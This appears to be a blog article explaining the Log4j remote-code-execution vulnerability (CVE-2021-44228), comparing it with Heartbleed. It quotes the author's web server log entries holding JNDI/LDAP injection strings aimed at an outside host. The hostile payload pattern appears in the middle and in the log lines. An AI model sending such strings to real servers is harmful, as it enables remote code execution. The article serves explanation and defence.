Log4j: The Worst Vulnerability In Nearly A Decade?
A Last Legacy of Problems?
And so in this most difficult of times, we have another Heartbleed. Well, not nearly as bad a Heartbleed, but certainly one of the most significant vulnerabilities we have seen in nearly a decade. And, we must be careful not to over-hype it, as it is no-where near as bad a Heartbleed (and which exposed the running memory of Web servers for sensitive data such as passwords and encryption keys).
It is, of course, Log4j, and which is a Java-based logging utility in Apache. The vulnerability (CVE-2021–44228) allows for remote code execution and which is triggered by a crafted string. It has since has gained the maximum severity level of 10 (‘a perfect 10’ … just like Heartbleed).
The focus of the attack is a specially crafted string contained in a web server request:
${jndi:ldap://[targetsite]/file}
On the 11th December 2021, my site received these (I have removed the IP address and replaced with X.X.X.X):
2021–12–11 18:10:12 10.0.0.7 GET / — 443– X.X.X.X ${jndi:ldap://http443useragent.kryptoslogic-cve-2021–44228.com/http443useragent} 301 0 0 2462021–12–11 19:47:25 10.0.0.7 GET /${jndi:ldap:/http443path.kryptoslogic-cve-2021–44228.com/http443path} — 443– X.X.X.X…